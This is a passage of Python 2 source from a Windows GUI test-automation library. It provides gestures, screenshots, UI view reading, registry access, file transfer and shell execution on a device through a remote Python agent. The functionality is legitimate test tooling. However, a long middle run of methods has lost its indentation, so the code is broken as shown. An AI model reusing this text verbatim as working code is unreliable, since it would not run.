            topWindowBbox = (0, 0, maxX, maxY)
    # the item must be both on the screen and within the top window
    return (fmbtgti._boxOnRegion(itemBox, (0, 0, maxX, maxY), partial=partial) and
            fmbtgti._boxOnRegion(itemBox, topWindowBbox, partial=partial))
def kill(self, pid):
    """
    Terminate process

    Parameters:

      pid (integer):
              ID of the process to be terminated.

    Returns True on success, otherwise False.
    """
    try:
        return self.existingConnection().evalPython(
            "kill(%s)" % (repr(pid),))
    except Exception:
        # best-effort: report failure instead of raising, but do not
        # swallow SystemExit/KeyboardInterrupt like the old bare
        # "except:" did
        return False
def keyNames(self):
    """
    Returns list of key names recognized by pressKey
    """
    names = list(_g_keyNames)
    names.sort()
    return names
def osProperties(self):
    """
    Returns OS properties as a dictionary
    """
    conn = self.existingConnection()
    return conn.evalPython("wmicGet('os')")
def pinch(self, (x, y), startDistance, endDistance,
          finger1Dir=90, finger2Dir=270, movePoints=20,
          duration=0.75):
    """
    Pinch (open or close) on coordinates (x, y).

    Parameters:
      x, y (integer):
              the central point of the gesture. Values in range
              [0.0, 1.0] are scaled to full screen width and
              height.

      startDistance, endDistance (float):
              distance from both finger tips to the central point
              of the gesture, at the start and at the end of the
              gesture. Values in range [0.0, 1.0] are scaled up to
              the distance from the coordinates to the edge of the
              screen. Both finger tips will reach an edge if
              distance is 1.0.

      finger1Dir, finger2Dir (integer, optional):
              directions for finger tip movements, in range [0,
              360]. 0 is to the east, 90 to the north, etc. The
              defaults are 90 and 270.

      movePoints (integer, optional):
              number of points to which finger tips are moved
              after laying them to the initial positions. The
              default is 20.

      duration (float, optional):
              duration of the gesture in seconds, the default is 0.75.
    """
    screenWidth, screenHeight = self.screenSize()
    screenDiagonal = math.sqrt(screenWidth**2 + screenHeight**2)
    # gesture center defaults to the middle of the screen
    if x == None: x = 0.5
    if y == None: y = 0.5
    x, y = self.intCoords((x, y))
    # relative distances scale to the nearest screen edge along the
    # finger directions; absolute distances are used as pixels
    if type(startDistance) == float and 0.0 <= startDistance <= 1.0:
        startDistanceInPixels = (
            startDistance *
            min(fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger1Dir),
                fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger2Dir)))
    else:
        startDistanceInPixels = int(startDistance)
    if type(endDistance) == float and 0.0 <= endDistance <= 1.0:
        endDistanceInPixels = (
            endDistance *
            min(fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger1Dir),
                fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger2Dir)))
    else:
        endDistanceInPixels = int(endDistance)
    # finger start/end points; screen y axis grows downwards, hence -sin
    finger1startX = int(x + math.cos(math.radians(finger1Dir)) * startDistanceInPixels)
    finger1startY = int(y - math.sin(math.radians(finger1Dir)) * startDistanceInPixels)
    finger1endX = int(x + math.cos(math.radians(finger1Dir)) * endDistanceInPixels)
    finger1endY = int(y - math.sin(math.radians(finger1Dir)) * endDistanceInPixels)
    finger2startX = int(x + math.cos(math.radians(finger2Dir)) * startDistanceInPixels)
    finger2startY = int(y - math.sin(math.radians(finger2Dir)) * startDistanceInPixels)
    finger2endX = int(x + math.cos(math.radians(finger2Dir)) * endDistanceInPixels)
    finger2endY = int(y - math.sin(math.radians(finger2Dir)) * endDistanceInPixels)
    self.existingConnection().sendPinch(
        (finger1startX, finger1startY), (finger1endX, finger1endY),
        (finger2startX, finger2startY), (finger2endX, finger2endY),
        movePoints, duration)
    return True
def pinchOpen(self, (x, y) = (0.5, 0.5), startDistance=0.1, endDistance=0.5, **pinchKwArgs):
    """
    Make the open pinch gesture.

    Parameters:

      x, y (integer, optional):
              the central point of the gesture, the default is in
              the middle of the screen.

      startDistance, endDistance (float, optional):
              refer to pinch documentation. The default is 0.1 and
              0.5.

      for the rest of the parameters, refer to pinch documentation.
    """
    # opening gesture: fingers move outwards (startDistance < endDistance)
    return self.pinch((x, y), startDistance, endDistance, **pinchKwArgs)
def pinchClose(self, (x, y) = (0.5, 0.5), startDistance=0.5, endDistance=0.1, **pinchKwArgs):
    """
    Make the close pinch gesture.

    Parameters:

      x, y (integer, optional):
              the central point of the gesture, the default is in
              the middle of the screen.

      startDistance, endDistance (float, optional):
              refer to pinch documentation. The default is 0.5 and
              0.1.

      rest of the parameters: refer to pinch documentation.
    """
    # closing gesture: fingers move inwards (startDistance > endDistance)
    return self.pinch((x, y), startDistance, endDistance, **pinchKwArgs)
def putFile(self, localFilename, remoteFilepath, data=None):
    """
    Send local file to the device.

    Parameters:

      localFilename (string):
              file to be sent.

      remoteFilepath (string):
              destination on the device. If destination is an
              existing directory, the file will be saved to the
              directory with its original local name. Otherwise the file
              will be saved with remoteFilepath as new name.

      data (string, optional):
              data to be stored to remoteFilepath. The default is
              the data in the local file.

    Example: Copy local /tmp/file.txt to c:/temp

      putFile("/tmp/file.txt", "c:/temp/")

    Example: Create new remote file

      putFile(None, "c:/temp/file.txt", "remote file contents")
    """
    conn = self._conn
    return conn.sendFile(localFilename, remoteFilepath, data)
def rmFile(self, remoteFilepath):
    """
    Remove a file from the device.

    Parameters:

      remoteFilepath (string):
              file to be removed from the device.
    """
    command = "os.remove(%s)" % (repr(remoteFilepath),)
    return self.existingConnection().evalPython(command)
def reconnect(self, connspec=None, password=None):
    """
    Close connections to the device and reconnect.

    Parameters:

      connspec (string, optional):
              Specification for new connection. The default is current
              connspec.

      password (string, optional):
              Password for new connection. The default is current password.

    Returns True on successful reconnect, otherwise False.
    """
    # drop the current connection first
    self.setConnection(None)
    import gc
    # encourage release of the old connection's resources (sockets)
    # before opening a new one
    gc.collect()
    if connspec != None:
        self._connspec = connspec
    if password != None:
        self._password = password
    if self._connspec == None:
        _adapterLog("reconnect failed: missing connspec")
        return False
    try:
        self.setConnection(WindowsConnection(
            self._connspec, self._password))
        return True
    except Exception, e:
        _adapterLog("reconnect failed: %s" % (e,))
        return False
def refreshView(self, window=None, forcedView=None, viewSource=None,
                items=None, properties=None, area=None):
    """
    (Re)reads widgets on the top window and updates the latest view.

    Parameters:

      window (integer (hWnd) or string (title), optional):
              read widgets from given window instead of the top window.

      forcedView (View or filename, optional):
              use given View object or view file instead of reading the
              items from the device.

      viewSource (string, optional):
              source of UI information. Supported sources are:
              "uiautomation" the UIAutomation framework.
              "enumchildwindows" less data
              but does not require UIAutomation.
              The default is "uiautomation".
              You can define TreeWalker used by "uiautomation" by defining
              viewSource as "uiautomation/raw", "uiautomation/control" or
              "uiautomation/content".
              See also setViewSource().

      items (list of view items, optional):
              update only contents of these items in the view.
              Works only for "uiautomation" view source.

      properties (list of property names, optional):
              read only given properties from items, the default
              is to read all available properties.
              Works only for "uiautomation" view source.
              See also setViewSource().

      area ((left, top, right, bottom), optional):
              refresh only items that intersect the area.
              The default is None: locations do not affect refreshed
              items.

    See also setRefreshViewDefaults().

    Returns View object.
    """
    # fill unspecified arguments from the stored defaults
    if window == None:
        window = self._refreshViewDefaults.get("window", None)
    if forcedView == None:
        forcedView = self._refreshViewDefaults.get("forcedView", None)
    if viewSource == None:
        viewSource = self.viewSource()
    if not viewSource in _g_viewSources:
        raise ValueError('invalid view source "%s"' % (viewSource,))
    if items == None:
        items = self._refreshViewDefaults.get("items", [])
    if properties == None:
        properties = self._refreshViewDefaults.get("properties", None)
    if area == None:
        area = self._refreshViewDefaults.get("area", None)
    if forcedView != None:
        # use a pre-made View object or a saved view dump file
        retryCount = 0
        startTime = time.time()
        lastStartTime = startTime
        viewFilename = forcedView
        if isinstance(forcedView, View):
            self._lastView = forcedView
        elif type(forcedView) in [str, unicode]:
            try:
                self._lastView = View(forcedView, ast.literal_eval(file(viewFilename).read()))
            except Exception:
                self._lastView = None
        endTime = time.time()
    else:
        # read fresh view data from the device, retrying on parse errors
        if self.screenshotDir() == None:
            self.setScreenshotDir(self._screenshotDirDefault)
        if self.screenshotSubdir() == None:
            self.setScreenshotSubdir(self._screenshotSubdirDefault)
        # view dump is stored next to screenshots (".png" -> ".view")
        viewFilename = self._newScreenshotFilepath()[:-3] + "view"
        retryCount = 0
        startTime = time.time()
        lastStartTime = startTime
        while True:
            try:
                topWindowBbox = self.topWindowProperties()['bbox']
            except TypeError:
                topWindowBbox = None # top window unavailable
            if area:
                leftTopRightBottom = (
                    self.intCoords((area[0], area[1])) +
                    self.intCoords((area[2], area[3])))
            else:
                leftTopRightBottom = None
            if viewSource == "enumchildwindows":
                viewData = self._conn.recvViewData(window)
            else:
                # uiautomation: pick the TreeWalker from the source name
                if "/" in viewSource:
                    walker = viewSource.split("/")[1]
                else:
                    walker = "raw"
                if properties != None:
                    if properties == "all":
                        viewItemProperties = None
                    elif properties == "fast":
                        # a small, commonly needed property set
                        viewItemProperties = ["AutomationId",
                                              "BoundingRectangle",
                                              "ClassName",
                                              "HelpText",
                                              "ToggleState",
                                              "Value",
                                              "Minimum",
                                              "Maximum",
                                              "Name"]
                    elif isinstance(properties, list) or isinstance(properties, tuple):
                        viewItemProperties = list(properties)
                    else:
                        raise ValueError('invalid properties argument, expected "all", '
                                         '"fast" or a list')
                else:
                    viewItemProperties = properties
                viewData = self._conn.recvViewUIAutomation(
                    window, items, viewItemProperties, leftTopRightBottom, walker)
            # persist the raw view data for later View(file) loading
            file(viewFilename, "w").write(repr(viewData))
            try:
                self._lastView = View(
                    viewFilename, viewData,
                    itemOnScreen=lambda i: self.itemOnScreen(i, topWindowBbox=topWindowBbox))
                break
            except Exception, e:
                # parsing failed: log and retry up to the retry limit
                self._lastView = None
                _adapterLog(
                    "refreshView %s failed (%s), source=%s topWindow=%s" %
                    (retryCount, e, repr(viewSource), self.topWindow()))
                retryCount += 1
                if retryCount < self._refreshViewRetryLimit:
                    time.sleep(0.2)
                else:
                    break
            lastStartTime = time.time()
        endTime = time.time()
    itemCount = -1
    if self._lastView:
        itemCount = len(self._lastView._viewItems)
    # statistics for debugging/inspection
    self._lastViewStats = {
        "retries": retryCount,
        "timestamp": endTime,
        "total time": endTime - startTime,
        "last time": endTime - lastStartTime,
        "filename": viewFilename,
        "source": viewSource,
        "forced": (forcedView != None),
        "window": window,
        "view": str(self._lastView),
        "item count": itemCount}
    return self._lastView
def refreshViewDefaults(self):
"""Returns default arguments for refreshView() calls.
See also setRefreshViewDefaults().
"""
return dict(self._refreshViewDefaults)
def setClipboard(self, data):
"""
Set text on clipboard
Parameters:
data (string):
data to be set on the clipboard.
Note: any type of data on clipboard will be emptied.
See also: getClipboard()
"""
return self.existingConnection().evalPython(
"setClipboardText(%s)" % (repr(data),))
def setErrorReporting(self, settings):
"""
Modify Windows error reporting settings (WER)
Parameters:
settings (dictionary):
WER settings and values to be set.
Example: disable showing interactive crash dialogs
setErrorReporting({"DontShowUI": 1})
See also: errorReporting(),
MSDN WER Settings.
"""
for setting in settings:
self.setRegistry(
r"HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting",
setting, settings[setting])
return True
    def setDisplaySize(self, size):
        """
        Transform coordinates of synthesized events (like a tap) from
        screenshot resolution to display input area size. By default
        events are synthesized directly to screenshot coordinates.

        Parameters:

          size (pair of integers: (width, height)):
                  width and height of display in pixels. If not given,
                  values from EnumDisplayMonitors are used.

        Returns None.
        """
        width, height = size
        screenWidth, screenHeight = self.screenSize()
        # Install forward and inverse scaling between screen (screenshot)
        # coordinates and display input coordinates.
        # NOTE(review): "/" is Python 2 integer division when all operands are
        # ints; under Python 3 this would yield floats -- confirm before porting.
        self._conn.setScreenToDisplayCoords(
            lambda x, y: (x * width / screenWidth,
                          y * height / screenHeight))
        self._conn.setDisplayToScreenCoords(
            lambda x, y: (x * screenWidth / width,
                          y * screenHeight / height))
def setForegroundWindow(self, window):
"""
Set a window with the title as a foreground window
Parameters:
window (title (string) or hwnd (integer):
title or handle of the window to be raised
foreground.
Returns True if the window was brought to the foreground,
otherwise False.
Notes: calls SetForegroundWindow in user32.dll.
"""
return self.existingConnection().sendSetForegroundWindow(window)
def setRefreshViewDefaults(self, **kwargs):
"""Set new default arguments for refreshView() calls
Parameters:
**kwargs (keyword arguments)
new default values for optional refreshView() parameters.
Note: default arguments are overridden by arguments given
directly in refreshView calls.
Note: setViewSource() can change the default arguments.
Example:
setRefreshViewDefaults(window="My app title",
viewSource="uiautomation/content")
"""
self._refreshViewDefaults = kwargs
def findRegistry(self, rootKey, key=None, valueName=None, limit=1):
"""Search for key and/or valueName from the registry.
Returns a list of matching (fullKeyPath, valueName) pairs
found under the rootKey. The list has at most limit items, the
default is 1.
Parameters:
rootKey (string):
root key path for the search. Example:
"HKEY_LOCAL_MACHINE".
key (string, optional):
key name to be searched for under the rootKey.
The key is a regular expression that is searched for
from full key path. Use "\\name$" to require exact
match.
If not given, valueName should be defined.
valueName (string, optional):
value name to be searched for under the rootKey.
The value can be a regular expression.
If not given, key should be defined and
returned valueName will be None.
limit (integer, optional):
maximum number of matches to be returned. The
default is 1. limit=None returns all matching
pairs.
Example:
findRegistry("HKEY_LOCAL_MACHINE", key="\\Windows$")
"""
if key == None and valueName == None:
raise ValueError("either key or valueName must be provided")
return self.existingConnection().evalPython(
'findRegistry(%s, key=%s, valueName=%s, limit=%s)' % (
repr(rootKey), repr(key), repr(valueName), repr(limit)))
def setRegistry(self, key, valueName, value, valueType=None):
"""
Set Windows registry value.
Parameters:
key (string):
full key name.
valueName (string):
name of the value to be set.
value (string):
string that specifies the new value.
valueType (string, optional for str and int values):
REG_BINARY, REG_DWORD, REG_DWORD_LITTLE_ENDIAN,
REG_DWORD_BIG_ENDIAN, REG_EXPAND_SZ, REG_LINK,
REG_MULTI_SZ, REG_NONE, REG_RESOURCE_LIST or REG_SZ.
Default types for storing str and int values
are REG_SZ and REG_DWORD.
Example:
setRegistry(r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet"
"\Control\Session Manager\Environment",
"PATH", r"C:\MyExecutables", "REG_EXPAND_SZ")
Returns True on success.
"""
return self.existingConnection().evalPython(
"setRegistry(%s,%s,%s,%s)" % (repr(key), repr(valueName),
repr(value), repr(valueType)))
def getRegistry(self, key, valueName):
"""
Return Windows registry value and type
Parameters:
key (string):
full key name.
valueName (string):
name of the value to be read.
Returns a pair (value, valueType)
Example:
getRegistry(r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet"
"\Control\Session Manager\Environment", "PATH")
"""
return self.existingConnection().evalPython(
"getRegistry(%s,%s)" % (repr(key), repr(valueName)))
def processList(self):
"""
Return list of processes running on the device.
Returns list of dictionaries with keys:
"pid": process ID, and
"ProcessImageFileName": full path to the executable in win32 format.
"""
return self.existingConnection().evalPython("processList()")
def processStatus(self, pid):
"""
Return status of a process
Parameters:
pid (integer):
Process ID of the process
Returns properties in a dictionary.
Example:
print "Memory usage:", processStatus(4242)["WorkingSetSize"]
"""
return self.existingConnection().evalPython(
"processStatus(%s)" % (repr(pid),))
def productList(self):
"""
Return list of products installed or advertised in the system
Returns list of dictionaries, each containing properties of a product.
"""
return self.existingConnection().evalPython("products()")
def pycosh(self, command):
"""
Run command in pycosh shell on the device.
Parameters:
command (string):
pycosh command to be executed. Pycosh implements
stripped-down versions of zip, tar, find, md5sum, diff,
grep, head, tail, curl,... the usual handy shell utils.
For information on pycosh commands, try
device.pycosh("help") or run in shell:
echo help | python -m pycosh.
"""
return self.existingConnection().pycosh(command)
def setScreenshotSize(self, size):
"""
Force screenshots from device to use given resolution.
Overrides detected monitor resolution on device.
Parameters:
size (pair of integers: (width, height)):
width and height of screenshot.
"""
self._conn.setScreenshotSize(size)
def setTopWindow(self, window):
"""
Set a window as a foreground window and bring it to front.
Parameters:
window (title (string) or hwnd (integer):
title or handle of the window to be raised
foreground.
Returns True if the window was brought to the foreground,
otherwise False.
Notes: calls SetForegroundWindow in user32.dll.
"""
return self.existingConnection().sendSetTopWindow(window)
def setViewSource(self, source, properties=None):
"""
Set default view source for refreshView()
Parameters:
source (string):
default source, "enumchildwindow" or "uiautomation",
"uiautomation/raw", "uiautomation/control",
"uiautomation/content".
properties (string or list of strings, optional):
set list of view item properties to be read.
"all" reads all available properties for each item.
"fast" reads a set of preselected properties.
list of strings reads properties in the list.
The default is "all".
Returns None.
See also refreshView(), viewSource(), refreshViewDefaults().
"""
if not source in _g_viewSources:
raise ValueError(
'invalid view source "%s", expected one of: "%s"' %
(source, '", "'.join(_g_viewSources)))
if properties != None:
self._refreshViewDefaults["properties"] = properties
self._refreshViewDefaults["viewSource"] = source
def shell(self, command):
"""
Execute command in Windows.
Parameters:
command (string or list of strings):
command to be executed. Will be forwarded directly
to subprocess.check_output. If command is a string,
then it will be executed in subshell, otherwise without
shell.
Returns what is printed by the command.
If you wish to receive exitstatus or standard output and error
separated from command, refer to shellSOE().
"""
return self._conn.evalPython('shell(%s)' % (repr(command),))
def shellSOE(self, command, asyncStatus=None, asyncOut=None, asyncError=None, cwd=None):
"""
Execute command on Windows.
Parameters:
command (string or list of strings):
command to be executed. If command is a list of
string, it will be executed without shell
(subprocess.check_output with shell=False).
If command is a single-line string, it will be
executed in shell (subprocess.check_output with
shell=True).
If command is a multiline string, it will be written
to a BAT file and executed as a script.
asyncStatus (string, True or None)
filename (on device) to which the status of
asynchronously executed shellCommand will be
written. If True, the command will be executed
asynchronously but exit status will not be
saved. The default is None, that is, command will be
run synchronously, and status will be returned in
the tuple.
asyncOut (string, True or None)
filename (on device) to which the standard output of
asynchronously executed shellCommand will be
written. If True, the command will be executed
asynchronously but output will not saved. The
default is None.
asyncError (string, True or None)
filename (on device) to which the standard error of
asynchronously executed shellCommand will be
written. If True, the command will be executed
asynchronously but standard error will not be
saved. The default is None.
cwd (string, optional)
current working directory in which the command
will be executed. If not given, the cwd defaults
to the current working directory of the pythonshare
server process on the device, or the cwd of the Python
process if executed on host without pythonshare-server.
Returns triplet: exit status, standard output and standard error
from the command.
If executing command fails, returns None, None, None.
"""
return self._conn.evalPython(
'shellSOE(%s, asyncStatus=%s, asyncOut=%s, asyncError=%s, cwd=%s)'
% (repr(command),
repr(asyncStatus), repr(asyncOut), repr(asyncError),
repr(cwd)))
def showWindow(self, window, showCmd=SW_NORMAL):
"""
Send showCmd to window.
Parameters:
window (window title (string) or handle (integer)):
window to which the command will be sent.
showCmd (integer or string):
command to be sent. Valid commands are 0..11:
SW_HIDE, SW_NORMAL, SW_MINIMIZED, SW_MAXIMIZE,
SW_NOACTIVATE, SW_SHOW SW_MINIMIZE, SW_MINNOACTIVE,
SW_SHOWNA, SW_RESTORE, SW_DEFAULT, SW_FORCEMINIMIZE.
Returns True if the window was previously visible,
otherwise False.
Notes: calls ShowWindow in user32.dll.
"""
return self.existingConnection().sendShowWindow(window, showCmd)
def tapText(self, text, partial=False, **tapKwArgs):
"""
Find an item with given text from the latest view, and tap it.
Parameters:
partial (boolean, optional):
refer to verifyText documentation. The default is
False.
tapPos (pair of floats (x, y)):
refer to tapItem documentation.
button, long, hold, count, delayBetweenTaps (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
items = self.existingView().findItemsByText(text, partial=partial, count=1, onScreen=True)
if len(items) == 0: return False
return self.tapItem(items[0], **tapKwArgs)
def topWindow(self):
"""
Returns a handle to the window.
"""
return self.existingConnection().evalPython(
"ctypes.windll.user32.GetForegroundWindow()")
def topWindowProperties(self):
"""
Return properties of the top window as a dictionary
"""
return self._conn.recvTopWindowProperties()
def verifyText(self, text, partial=False):
"""
Verify that the last view has at least one item with given
text.
Parameters:
text (string):
text to be searched for in items.
partial (boolean, optional):
if True, match items if item text contains given
text, otherwise match only if item text is equal to
the given text. The default is False (exact match).
"""
assert self._lastView != None, "View required."
return self._lastView.findItemsByText(text, partial=partial, count=1, onScreen=True) != []
def viewSource(self):
"""
Returns current default view source.
See also refreshView(), setViewSource().
"""
return self._refreshViewDefaults.get(
"viewSource", self._defaultViewSource)
def windowList(self):
"""
Return list of properties of windows (dictionaries)
Example: list window handles and titles:
for props in d.windowList():
print props["hwnd"], props["title"]
"""
return self._conn.recvWindowList()
def windowProperties(self, window):
"""
Returns properties of a window.
Parameters:
window (title (string) or hwnd (integer):
The window whose properties will be returned.
Returns properties in a dictionary.
"""
return self.existingConnection().recvWindowProperties(window)
def windowStatus(self, window):
"""
Returns status of a window.
Parameters:
window (title (string) or hwnd (integer):
The window whose properties will be returned.
Returns status in a dictionary.
"""
return self.existingConnection().recvWindowStatus(window)
def view(self):
return self._lastView
def viewStats(self):
return self._lastViewStats
class _NoPythonshareConnection(object):
    """Fake Pythonshare connection, evaluate everything locally"""
    def __init__(self, namespace="default"):
        # Maps namespace name -> dict used as globals for exec/eval.
        self._namespaces = {}
        self._ns = namespace

    def exec_in(self, ns, code):
        # Lazily create the namespace on first use.
        if not ns in self._namespaces:
            self._namespaces[ns] = {}
        # Python 2 exec statement: run code with the namespace dict as globals.
        exec code in self._namespaces[ns]

    def eval_in(self, ns, expr):
        # Lazily create the namespace on first use.
        if not ns in self._namespaces:
            self._namespaces[ns] = {}
        return eval(expr, self._namespaces[ns])

    def namespace(self):
        # Return the default namespace name given at construction time.
        return self._ns
class WindowsConnection(fmbtgti.GUITestConnection):
    """GUI test connection to a Windows device.

    Commands are executed by sending Python code to the fmbtwindows agent
    through a pythonshare connection. If connspec is None, the agent code
    runs locally in this process (Windows hosts only).
    """
    def __init__(self, connspec, password):
        fmbtgti.GUITestConnection.__init__(self)
        self._screenshotSize = (None, None) # autodetect
        self._pycosh_sent_to_dut = False
        if connspec != None:
            self._agent = pythonshare.connect(connspec, password=password)
        else:
            if os.name != "nt":
                raise ValueError("connecting to host works only on Windows")
            self._agent = _NoPythonshareConnection()
        self._agent_ns = self._agent.namespace()
        # Load the agent code (fmbtwindows_agent.py, located next to this
        # module) into the remote/local agent namespace.
        agentFilename = os.path.join(
            os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))),
            "fmbtwindows_agent.py")
        self._agent.exec_in(self._agent_ns, file(agentFilename).read())
        # Default: identity transformation between screen and display coords.
        self.setScreenToDisplayCoords(lambda x, y: (x, y))
        self.setDisplayToScreenCoords(lambda x, y: (x, y))

    def pycosh(self, command):
        # Upload the pycosh module to the device on first use, then
        # evaluate the command remotely.
        if not self._pycosh_sent_to_dut:
            # upload pycosh module to DUT
            self.execPython(file(inspect.getsourcefile(pycosh)).read())
            self._pycosh_sent_to_dut = True
        return self.evalPython("pycosh_eval(%s)" % (repr(command),))

    def setScreenshotSize(self, screenshotSize):
        # Force the screenshot size and derive screen<->display coordinate
        # transformations from the mouse input area reported by the agent.
        # NOTE(review): "/" is Python 2 integer division when operands are
        # ints -- confirm before porting to Python 3.
        self._screenshotSize = screenshotSize
        screenW, screenH = self._screenshotSize
        inputW, inputH = self._agent.eval_in(self._agent_ns, "_mouse_input_area")
        self.setScreenToDisplayCoords(
            lambda x, y: (x * inputW / screenW, y * inputH / screenH))
        self.setDisplayToScreenCoords(
            lambda x, y: (x * screenW / inputW, y * screenH / inputH))

    def execPython(self, code):
        # Execute a statement/block in the agent namespace.
        return self._agent.exec_in(self._agent_ns, code)

    def evalPython(self, code):
        # Evaluate an expression in the agent namespace and return its value.
        return self._agent.eval_in(self._agent_ns, code)

    def recvFile(self, remoteFilename, localFilename=None, compress=False):
        # Fetch a file from the device, optionally zlib-compressed in transit.
        # Returns True if written to localFilename, otherwise the file data.
        if compress:
            # NOTE(review): isinstance(True, int) is True in Python, so the
            # else branch is unreachable and compress=True uses compression
            # level True (== 1), not 3 -- confirm intent.
            if isinstance(compress, int):
                compressLevel = compress
            else:
                compressLevel = 3
            data = self._agent.eval_in(
                self._agent_ns,
                "zlib.compress(file(%s, 'rb').read(), %s)" % (
                    repr(remoteFilename), compressLevel))
            data = zlib.decompress(data)
        else:
            data = self._agent.eval_in(
                self._agent_ns,
                "file(%s, 'rb').read()" % (repr(remoteFilename),))
        if localFilename:
            file(localFilename, "wb").write(data)
            return True
        else:
            return data

    def sendFile(self, localFilename, remoteFilepath, data=None):
        # Send a local file (or raw data) to the device; the content is
        # base64-encoded for transport.
        if data == None:
            data = file(localFilename).read()
        if localFilename:
            basename = os.path.basename(localFilename)
        else:
            basename = localFilename
        rv = self.evalPython('saveFile(%s, %s, base64.b64decode(%s))' %
                             (repr(basename),
                              repr(remoteFilepath),
                              repr(base64.b64encode(data))))
        return rv

    def recvMatchingPaths(self, pathnamePattern):
        # Glob on the device, returns matching paths.
        return self._agent.eval_in(self._agent_ns,
                                   "glob.glob(%s)" % (repr(pathnamePattern),))

    def recvScreenshot(self, filename, screenshotSize=(None, None)):
        # Grab a zlib-compressed BGR screenshot from the agent and save it as
        # PNG (when fmbtpng is available) or via ImageMagick convert.
        ppmfilename = filename + ".ppm"
        if screenshotSize == (None, None):
            screenshotSize = self._screenshotSize
        width, height, zdata = self._agent.eval_in(
            self._agent_ns, "screenshotZYBGR(%s)" % (repr(screenshotSize),))
        data = zlib.decompress(zdata)
        # Convert BGR byte order to RGB in place.
        fmbtgti.eye4graphics.wbgr2rgb(data, width, height)
        if fmbtpng != None:
            file(filename, "wb").write(
                fmbtpng.raw2png(data, width, height, 8, "RGB"))
        else:
            # Fall back to writing a temporary PPM and converting it with
            # ImageMagick, then remove the temporary file.
            ppm_header = "P6\n%d %d\n%d\n" % (width, height, 255)
            f = file(filename + ".ppm", "wb")
            f.write(ppm_header)
            f.write(data)
            f.close()
            _run([fmbt_config.imagemagick_convert, ppmfilename, filename], expectedExitStatus=[0])
            os.remove(ppmfilename)
        return True

    def recvTopWindowProperties(self):
        return self.evalPython("topWindowProperties()")

    def recvWindowProperties(self, window):
        hwnd = self._window2hwnd(window)
        return self.evalPython("windowProperties(%s)" % (hwnd,))

    def recvWindowStatus(self, window):
        hwnd = self._window2hwnd(window)
        return self.evalPython("windowStatus(%s)" % (hwnd,))

    def recvViewData(self, window=None):
        # Read widget data with the enumchildwindows backend. window may be
        # None (top window), a hwnd (integer) or a window title (string).
        rv = None
        if window == None:
            rv = self.evalPython("topWindowWidgets()")
        elif isinstance(window, int):
            rv = self.evalPython("windowWidgets(%s)" % (repr(window),))
        elif isinstance(window, str) or isinstance(window, unicode):
            wlist = self.evalPython("windowList()")
            for w in wlist:
                if w["title"] == window:
                    rv = self.evalPython("windowWidgets(%s)" % (repr(w["hwnd"]),))
                    break
            else:
                raise ValueError('no window with title "%s"' % (window,))
        else:
            raise ValueError('illegal window "%s", expected integer or string (hWnd or title)' % (window,))
        return rv

    def recvViewUIAutomation(self, window=None, items=[], properties=None, area=None, walker="raw"):
        """returns list of dictionaries, each of which contains properties of
        an item"""
        # NOTE(review): mutable default argument (items=[]) -- harmless here
        # because the list is only iterated, never mutated.
        if not walker in ["raw", "control", "content"]:
            raise ValueError('invalid walker %s' % (repr(walker),))
        if window != None:
            hwnd = self._window2hwnd(window)
        else:
            hwnd = None
        if properties == None:
            properties = []
        else:
            # make sure certain properties are always included
            propertySet = set(properties)
            for must_be in ["BoundingRectangle"]:
                propertySet.add(must_be)
            properties = list(propertySet)
        dumps = []
        if items:
            # Restrict the dump to the branches of the requested items.
            for item in items:
                dumps.append(self.evalPython("dumpUIAutomationElements(%s, %s, %s, %s, %s)" % (
                    repr(hwnd),
                    repr([str(item.id()) for item in item.branch()]),
                    repr(properties),
                    repr(area),
                    repr(walker))))
        else:
            dumps.append(self.evalPython("dumpUIAutomationElements(%s, %s, %s, %s, %s)" % (
                repr(hwnd),
                repr([]),
                repr(properties),
                repr(area),
                repr(walker))))
        rv = []
        prop_data = {}
        # Parse "name=value" lines from each dump; a "hash=..." line starts
        # a new item dictionary.
        for dump in dumps:
            for prop_line in dump.splitlines():
                if not "=" in prop_line:
                    continue
                prop_name, prop_value = prop_line.split("=", 1)
                if prop_name == "hash":
                    if prop_data:
                        rv.append(prop_data)
                    prop_data = {}
                prop_data[prop_name] = prop_value.replace(r"\r\n", "\n").replace(r"\\", "\\")
        if prop_data:
            rv.append(prop_data)
        return rv

    def recvWindowList(self):
        return self.evalPython("windowList()")

    def _window2hwnd(self, window):
        # Resolve a window reference (title string, properties dict with an
        # "hwnd" key, or raw hwnd integer) into a window handle.
        if isinstance(window, str) or isinstance(window, unicode):
            windowList = self.recvWindowList()
            hwndList = [w["hwnd"] for w in windowList if w["title"] == window]
            if not hwndList:
                raise ValueError('no window with title "%s"' % (window,))
            hwnd = hwndList[0]
        elif isinstance(window, dict) and "hwnd" in window:
            hwnd = window["hwnd"]
        elif isinstance(window, int) or isinstance(window, long):
            hwnd = window
        else:
            raise ValueError('invalid window "%s", string, integer or dict with "hwnd" key expected' % (window,))
        return hwnd

    def sendCloseWindow(self, window):
        hwnd = self._window2hwnd(window)
        return self.evalPython("closeWindow(%s)" % (repr(hwnd),))

    def sendSetForegroundWindow(self, window):
        hwnd = self._window2hwnd(window)
        # Nonzero return from SetForegroundWindow means success.
        return 0 != self.evalPython("ctypes.windll.user32.SetForegroundWindow(%s)" %
                                    (repr(hwnd),))

    def sendSetTopWindow(self, window):
        hwnd = self._window2hwnd(window)
        return 0 != self.evalPython("setTopWindow(%s)" %
                                    (repr(hwnd),))

    def sendShowWindow(self, window, showCmd):
        hwnd = self._window2hwnd(window)
        return self.evalPython("showWindow(%s, %s)" % (repr(hwnd), repr(showCmd)))

    def sendType(self, text):
        command = 'sendType(%s)' % (repr(text),)
        self._agent.eval_in(self._agent_ns, command)
        return True

    def sendPress(self, keyCode, modifiers=None):
        if modifiers == None:
            command = 'sendKey("%s",[])' % (keyCode,)
        else:
            command = 'sendKey("%s",%s)' % (keyCode, repr(modifiers))
        self._agent.eval_in(self._agent_ns, command)
        return True

    def sendKeyDown(self, keyCode, modifiers=None):
        if modifiers == None:
            command = 'sendKeyDown("%s",[])' % (keyCode,)
        else:
            command = 'sendKeyDown("%s",%s)' % (keyCode, repr(modifiers))
        self._agent.eval_in(self._agent_ns, command)
        return True

